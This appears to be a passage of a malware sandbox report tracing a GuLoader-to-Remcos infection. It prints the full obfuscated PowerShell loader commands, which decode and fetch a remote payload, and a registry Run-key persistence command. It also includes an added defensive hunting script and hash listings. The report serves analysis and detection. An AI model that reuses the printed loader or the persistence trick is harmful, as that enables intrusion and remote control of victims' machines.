O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1774074401.000001CBABCF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:08:16:57
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:08:17:08
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. 
alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. 
RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L 
O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
                                                              Imagebase:0xaa0000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1994393544.00000000089E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1982397865.0000000005F76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1994713793.000000000927D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:08:17:08
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:08:17:29
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                              Imagebase:0x720000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2949377378.000000002377E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:11
                                                              Start time:08:17:38
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
                                                              Imagebase:0x240000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:12
                                                              Start time:08:17:38
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:08:17:38
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
                                                              Imagebase:0xa60000
                                                              File size:59'392 bytes
                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

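The reg.exe command line recorded for Target ID 13 is the persistence step of this chain: a REG_EXPAND_SZ value under HKCU\...\Run whose interpreter is hidden behind the %Hexokinase% environment variable, and whose real script is not on disk at all but is read at logon from the 'carlcorey' value under HKCU\Software\Skulptureredes and then executed. Where %Hexokinase% is defined is not visible in this part of the report. The PowerShell below is an added hunting check written for this page; it is not part of the Joe Sandbox report or of the sample. It assumes it runs in the context of the user whose HKCU is being inspected, and the allow-list of Windows-defined environment variable names is the script's own choice, not something the report states.

```powershell
# Added hunting script (not part of the Joe Sandbox report or the sample).
# Flags Run/RunOnce values that follow the pattern recorded for Target ID 13:
#   - a REG_EXPAND_SZ command that begins with a non-standard %VARIABLE%
#   - an expanded command that launches a script host or LOLBin
#   - a command that reads its real payload from another registry value (gp / Get-ItemProperty)
# Assumptions: run as the user whose HKCU is inspected; $knownEnv is this script's own
# allow-list of variables Windows itself defines, chosen for the example.

$runPaths = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Variables Windows sets by default; anything else in front of a Run command is worth a look
$knownEnv = @('windir', 'SystemRoot', 'ProgramFiles', 'ProgramFiles(x86)', 'ProgramData',
              'LOCALAPPDATA', 'APPDATA', 'USERPROFILE', 'ComSpec', 'SystemDrive', 'PUBLIC')

function Test-RunValue {
    param([string]$Path, [Microsoft.Win32.RegistryKey]$Key, [string]$Name)

    # Read the value as written (no %VAR% expansion) so the operator's indirection stays visible
    $raw  = [string]$Key.GetValue($Name, '', [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames)
    $kind = $Key.GetValueKind($Name)
    $expanded = [Environment]::ExpandEnvironmentVariables($raw)
    $reasons  = @()

    # Pattern 1: command starts with an environment variable that Windows does not define
    if ($kind -eq [Microsoft.Win32.RegistryValueKind]::ExpandString -and $raw -match '^\s*%([^%]+)%') {
        $envName = $Matches[1]
        if ($knownEnv -notcontains $envName) {
            $userDef = [Environment]::GetEnvironmentVariable($envName, 'User')
            $reasons += "command hidden behind custom variable %$envName% (user-scope value: '$userDef')"
        }
    }
    # Pattern 2: after expansion the entry runs a script host or a commonly abused binary
    if ($expanded -match '(?i)\b(powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32)\b') {
        $reasons += 'expands to a script host or LOLBin'
    }
    # Pattern 3: the entry pulls its payload from a second registry value
    if ($raw -match '(?i)\b(gp|Get-ItemProperty)\b[^;]*HK(CU|LM):') {
        $reasons += 'loads its payload from another registry value'
    }

    if ($reasons.Count -eq 0) { return }
    [pscustomobject]@{
        Key      = $Path
        Value    = $Name
        Kind     = $kind
        Raw      = $raw
        Expanded = $expanded
        Reasons  = ($reasons -join '; ')
    }
}

$findings = foreach ($path in $runPaths) {
    $key = Get-Item -Path $path -ErrorAction SilentlyContinue
    if (-not $key) { continue }
    foreach ($name in $key.GetValueNames()) {
        Test-RunValue -Path $path -Key $key -Name $name
    }
}

if ($findings) { $findings | Format-List } else { 'No suspicious Run-key entries found.' }
```

Reading the value with DoNotExpandEnvironmentNames matters: Get-ItemProperty returns the already-expanded string, which hides the %Hexokinase% indirection and makes the entry look like an ordinary powershell.exe launch. When an entry is flagged, dump the referenced second-stage value (here the 'carlcorey' value) before removing anything, since it is the only copy of the script.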
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f16496b709e3ea856bc8f95bbe8860a3b408a9bcff4b0b47838afc8c310816f3
                                                                • Instruction ID: a490a97457478631954cbd1d38ec812e90461b782584378d844af8ab61e7170f
                                                                • Opcode Fuzzy Hash: f16496b709e3ea856bc8f95bbe8860a3b408a9bcff4b0b47838afc8c310816f3
                                                                • Instruction Fuzzy Hash: F1020763A0EBC60FE7AA9B6848A52647FE1EF57210F1901FED099CB1D3D9196C45C342
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782254130.00007FFD9A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A170000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a170000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 26718790a8e2c7959da66a9eb9a27ee07969aadd6172821c5b8631ba8700827c
                                                                • Instruction ID: 22f9236325237d6015ebc70dad0bd46d4181df1af30eeff748b3cffa5d7c86e6
                                                                • Opcode Fuzzy Hash: 26718790a8e2c7959da66a9eb9a27ee07969aadd6172821c5b8631ba8700827c
                                                                • Instruction Fuzzy Hash: 18D16731A1CA4D4FEBA8DF28C8557E977D1FF68300F14426AD85EC7695CF34A9808B81
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782254130.00007FFD9A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A170000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a170000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b5e2de992a412b2040d593117b249130e3d3879f602b184c797230a76e75fafa
                                                                • Instruction ID: a16b3e5cf53900a57d4d5a6a838c29ae6975da25f1c2189101c20503731db479
                                                                • Opcode Fuzzy Hash: b5e2de992a412b2040d593117b249130e3d3879f602b184c797230a76e75fafa
                                                                • Instruction Fuzzy Hash: 7DD17331A18A4E8FEBA8DF28C8557F977D1FB68300F14827AD80DD7295DF7499808B81
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782254130.00007FFD9A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A170000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a170000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e136818102f831bd0a43c4850f040451a370e31ee117e7c1937a9103a8401da4
                                                                • Instruction ID: 28af4c56127aa10d4caa7564c3f6a3c9dcff63c74fed90790a4fbc485e7c0639
                                                                • Opcode Fuzzy Hash: e136818102f831bd0a43c4850f040451a370e31ee117e7c1937a9103a8401da4
                                                                • Instruction Fuzzy Hash: 1032B431A18A4D8FDF98DF5CC4A5AA977E1FFA8310F1401AED449D7296CA35F881CB81
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d3456f7939a953232e43c9ca58e42b9db6ffec707b7bd51bfcbc472037c44f20
                                                                • Instruction ID: 00891d81196c8020cc3c48a9e3db3bb8ba216d8f00ea1473be97857db3859fc8
                                                                • Opcode Fuzzy Hash: d3456f7939a953232e43c9ca58e42b9db6ffec707b7bd51bfcbc472037c44f20
                                                                • Instruction Fuzzy Hash: 30220623A0DB860FE7AADB6848656A47BE1EF57210F1801FED09DC71D7DE19AC45C342
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ef682a469ec09e16a80e2452c0f87bcc0f9537a3e4fb00d0f032d2cf4941acbe
                                                                • Instruction ID: d47171b970d56d4c3f09cbfc728ee51ce8c6dd3e42cd843d033774e107a618e3
                                                                • Opcode Fuzzy Hash: ef682a469ec09e16a80e2452c0f87bcc0f9537a3e4fb00d0f032d2cf4941acbe
                                                                • Instruction Fuzzy Hash: FCF13733B0DA8B4FE7B9876858651B47BE2EF97224B1811FAD46DC71D3DE18AC068341
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a786d81e98bf9e17a0cf3d451e23b39269061470310abc4f3801127f8d5acd58
                                                                • Instruction ID: c7caa302d95cfd7cfa97860f72220488c0c72ac825599010d120b13db20a0ad1
                                                                • Opcode Fuzzy Hash: a786d81e98bf9e17a0cf3d451e23b39269061470310abc4f3801127f8d5acd58
                                                                • Instruction Fuzzy Hash: 9CF11523E0DB860FE7A9DB6848A56A87BE1EF56210F1811FED05CCB1C7DE19AC45D342
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 501dc67bcb615ce2bfe47b679d1b8c8a37ff1a3ddc9f85d349c0e81d9fce9eb1
                                                                • Instruction ID: 5ec619a57b45e56206892a6cb3c82bb51572a8a9b0f6f638d426749f4ded79f8
                                                                • Opcode Fuzzy Hash: 501dc67bcb615ce2bfe47b679d1b8c8a37ff1a3ddc9f85d349c0e81d9fce9eb1
                                                                • Instruction Fuzzy Hash: 04D12823B0DA8A4FE7AADAA948A46B47BE1EF56310B0801FFD05DCB1D7D919AC45C341
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f52e9c8285c2ebb07ecdd579099d25e229f05b7372e0fb8b0761ef4df2563cce
                                                                • Instruction ID: 09ad6c1f4f8c68bec1e8455b389a6bca9a27cffa789cb239209991c2ddfe95d3
                                                                • Opcode Fuzzy Hash: f52e9c8285c2ebb07ecdd579099d25e229f05b7372e0fb8b0761ef4df2563cce
                                                                • Instruction Fuzzy Hash: 5ED10763E0EB860FE7A9DB6848656787BE1EF56210F1801FED09C871D7DE19AC45C342
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5620b44c2eb41b982019d9d866e55538f327a24c6619a9902892a2c1ffd5403a
                                                                • Instruction ID: 31b9f2590b97bf3a0ef311238740c59b1806fc2675d9b673ebf316aefa1cdd65
                                                                • Opcode Fuzzy Hash: 5620b44c2eb41b982019d9d866e55538f327a24c6619a9902892a2c1ffd5403a
                                                                • Instruction Fuzzy Hash: FDA12573B0DA8B0FE7AD9AA85C615B537D1EF97220B4811FEE05DC70D7ED19AC029242
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 344fe4d0ab51c5672ed6a0aa79d8fdc16a6bfdc60dce42102673dab51c1c52d7
                                                                • Instruction ID: c14ba0c095ccb05f48fc3aa920b77a67b4b89f8118bebdbc06215c5bd1e89d18
                                                                • Opcode Fuzzy Hash: 344fe4d0ab51c5672ed6a0aa79d8fdc16a6bfdc60dce42102673dab51c1c52d7
                                                                • Instruction Fuzzy Hash: 06A12623F0EA8A4FEBA9DA6C58645B97BD1EF56220F0801FBD09DC71D3ED18AC458341
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782254130.00007FFD9A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A170000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a170000_powershell.jbxd
